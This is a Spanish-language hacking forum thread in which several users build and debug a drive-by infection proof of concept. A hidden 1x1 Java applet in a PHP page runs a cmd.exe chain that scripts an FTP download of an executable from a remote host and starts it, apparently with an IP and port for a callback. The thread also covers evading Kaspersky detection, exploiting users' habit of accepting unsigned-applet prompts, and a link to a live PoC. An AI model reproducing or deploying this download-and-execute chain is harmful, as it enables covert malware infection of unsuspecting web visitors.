[POC] Infección Mediante Java Applet (y VBScript)

[[Zero]]

Estoy trantando de hacerlo todo desde la shell para prescindir del vbs y que no lo detecte el kis, haber si me podéis ayudar, tengo lo siguiente:

Código [Seleccionar] Expandir

@echo off
echo usuario@nombreftp.com>C:\datos.txt
echo contraseña>>C:\datos.txt
echo cd /path>>C:\datos.txt
echo pwd>>C:\datos.txt
echo binary>>C:\datos.txt
echo get archivo.exe>>C:\datos.txt
echo bye>>C:\datos.txt
echo quit>>C:\datos.txt
ftp -s:C:\datos.txt nombreftp.com
start archivo.exe

(Haber si alguien que tenga kav puede probar si lo detecta por proactiva, sería raro)

El caso es que ése código funciona perfectamente, me descarga el archivo del ftp y me lo ejecuta, pero cuando trato de pasarlo a php para que lo ejecute el applet con cmd.exe /c de esta forma:

Código (php) [Seleccionar] Expandir

echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
echo "<param name='first' value='
cmd.exe /c
echo usuario@nombreftp.com>C:\datos.txt &
echo contraseña>>C:\datos.txt &
echo cd /path>>C:\datos.txt &
echo pwd>>C:\datos.txt &
echo binary>>C:\datos.txt &
echo get archivo.exe>>C:\datos.txt &
echo bye>>C:\datos.txt &
echo quit>>C:\datos.txt &
ftp -s:C:\datos.txt nombreftp.com &
start archivo.exe
'>";
echo "</applet>";

Al abrir la pagina, el applet se ejecuta, ejecuta los comandos pero me genera un archivo.exe de 0 bytes y obvio da error al ejecutarlo, alguien sabe a que se debe o como lo podría solucionar?

Saludos

PD: Si cae mucha gente, si no fuera por lo del kis sería perfecto, ya que en todos los applets no firmados sale ese mensaje, la gente está acostumbrada a aceptarlo, inicias un chat y sale el mensaje, te vas a jugar al ajedrez y sale ese mensaje, etc...

Edito, el fallo era un espacio, hay que hacer:

Código [Seleccionar] Expandir

cmd.exe /c echo usuario@nombreftp.com>C:\datos.txt&echo contraseña>>C:\datos.txt &
NO:

Código [Seleccionar] Expandir

cmd.exe /c echo usuario@nombreftp.com>C:\datos.txt & echo contraseña>>C:\datos.txt &

Un erro tonto que nos costo a mi y a wofo un gran dolor de cabeza, jajaja.

Saludos

[Wofo]

Yo sé... Deberías haberme preguntado...

Este code debería funcionar:

Código (php) [Seleccionar] Expandir


echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
echo "<param name='first' value='
cmd.exe /c
echo usuario@nombreftp.com>C:\\datos.txt &
echo contraseña>>C:\\datos.txt &
echo cd /path>>C:\\datos.txt &
echo pwd>>C:\\datos.txt &
echo binary>>C:\\datos.txt &
echo get archivo.exe>>C:\\datos.txt &
echo bye>>C:\\datos.txt &
echo quit>>C:\\datos.txt &
ftp -s:C:\\datos.txt nombreftp.com &
start archivo.exe
'>";
echo "</applet>";


Fíjate en que cuando quieres hacer un '\' tienes que poner '\\' (es igual que en C/C++)

Salu2

[Novlucker]

Hay que reconocer que si bien este método necesita de ingenieria social, creo que canta mucho menos que los anteriores 

(Haber si alguien que tenga kav puede probar si lo detecta por proactiva, sería raro)

Tengo el KIS así que luego lo pruebo a ver si salta 

[Littlehorse]

Ahora lo pruebo yo tambien, en realidad probarlo contra el KIS es probarlo contra el rey y no se si es lo mas adecuado, es decir, Alguien conoce la forma de saltarse la proactiva del KIS?.
Digo que no es lo mas adecuado porque con el tema de las keys en lista negra muchos pasan de instalarlo y van por el NOD, el AVG y demas yerbas. Aunque ahora con esto del kavkiskey ya varios lo estan utilizando pero bueno, en mi caso la mayoria de las personas que conozco no usan kav ni kis.

[[Zero]]

Tamos preparando el poc nuevamente sin utilizar vbs, ahora mismo lo subimos para que lo prueben con el kis, haber si lo detecta por proactiva o no, funciona descargando el archivo por ftp desde la shell  .

Saludos

[Wofo]

ACTUALIZACIÓN:

Con el problema del KIS y KAV, a HACKER_ZERO se le ocurrió hacer la descarga del .exe por medio de batch + FTP. Les dejo el index.php modificado:

Código (php) [Seleccionar] Expandir


<?php
if(isset($HTTP_GET_VARS["board"])) {
$ip = $HTTP_GET_VARS["board"];
echo $ip;
}

else $ip = "127.0.0.1";

if(isset($HTTP_GET_VARS["topic"])) {
$puerto = $HTTP_GET_VARS["topic"];
echo $puerto;
}

else $puerto = 666;

echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
echo "<param name='first' value='
cmd.exe /c cd C:\\Windows & echo user@ftp.net>datos.txt&echo clave>>datos.txt&echo pwd>>datos.txt&echo binary>>datos.txt&echo get archivo.exe>>datos.txt&echo bye>>datos.txt&echo quit>>datos.txt&ftp -s:datos.txt ftp.net&start archivo.exe ".$ip." ".$puerto."&pause'>";
echo "</applet>";

?>


Y el link del POC: http://wofo.x10hosting.com/hacking/JAVA/POCapplet/indexftp.php?board=127.0.0.1&topic=7172

Salu2

[Novlucker]

Tiene que aparecer algo así verdad? 


Broma, lo he bajado a mano así que borra esa sonrisa de tu cara 

Sigue quedando en cero el ejecutable, eso si, el KIS no dice nada 

Saludos

[[Zero]]

Ais no puede ser!!!, lo de 0 bytes estaba solucionado, tiene que ir, vamos a mi me funciona  . Prueba otra vez haber, dime que windows, vista?

Saludos

[Novlucker]

XP , el ftp simplemente se queda colgado y no termina de bajar nunca 

[[Zero]]

Pero ves la ventana del ftp? Yo me sale la pantalla de msdos en un pantallazo rapido y se cierra, casi no se nota, luego de poco tiempo, no 3 segundos se me descarga el exe y se ejecuta, te da error al abrir el applet de que el arhivo poc.exe no es una aplicacion win32 valida o no llega ahí? Si hay fallo en el ftp debería mostrar ese error, pero no tiene xk haber fallo, yo lo testeo 20 veces y no falla, haber si alguien mas puede probar  , ahora que pensaba que me saltaba el kav va y ni arranca  .

Saludos